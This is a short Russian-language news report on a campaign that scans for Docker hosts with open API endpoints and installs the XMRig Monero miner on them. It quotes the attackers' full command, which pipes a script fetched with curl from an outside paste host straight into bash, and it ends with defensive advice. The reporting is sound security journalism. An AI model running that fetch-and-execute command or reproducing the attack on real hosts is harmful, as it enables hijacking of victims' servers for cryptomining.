Группа хакеров запустила масштабную кампанию по поиску Docker-контейнеров с открытыми конечными точками API для последующей установки на них майнера криптовалюты Monero (XMR). Проблема была обнаружена специалистами по кибербезопасности из компании Bad Packets LLC.

Docker представляет собой систему развертывания приложений, с поддержкой контейнеризации. Приложение со всем окружением можно упаковать в контейнер, которым легко и просто управлять: переносить на другой сервер, масштабировать или обновлять.

В настоящее время хакеры просканировали более 59 000 IP-сетей. После обнаружения уязвимого хоста злоумышленники используют конечную точку API для запуска контейнера ОС Alpine Linux и загрузки скрипта Bash:

chroot /mnt /bin/sh -c ‘curl -sL4 http://ix.io/1XQa | bash;

Этот скрипт устанавливает классический майнер криптовалюты XMRRig. За два дня хакеры добыли 14,82 XMR (около $815 на момент публикации).

Специалисты Bad Packets LLC рекомендуют пользователям Docker проверять, выставляют ли они свои конечные точки API в интернете, закрывать порты и завершать работу нераспознанных запущенных контейнеров.

Напомним, в октябре через образы контейнеров Docker из открытого депозитария Docker Hub распространялся червь, заразивший 2000 машин программой для скрытого майнинга Monero.